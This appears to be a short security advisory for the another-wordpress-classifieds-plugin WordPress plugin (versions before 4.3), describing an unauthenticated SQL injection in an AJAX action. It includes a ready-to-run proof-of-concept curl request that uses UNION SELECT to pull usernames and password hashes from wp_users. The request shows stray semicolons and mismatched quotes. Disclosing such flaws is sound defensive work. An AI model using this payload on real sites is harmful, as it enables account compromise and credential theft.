The plugin does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users and when a specific premium module is active, leading to a SQL injection
To read the user_login and user_pass columns from the wp_users table: curl -i ‘https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent;_type=country&context;=search&parent;=Algeria&type;=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-’
CPE | Name | Operator | Version |
---|---|---|---|
another-wordpress-classifieds-plugin | lt | 4.3 |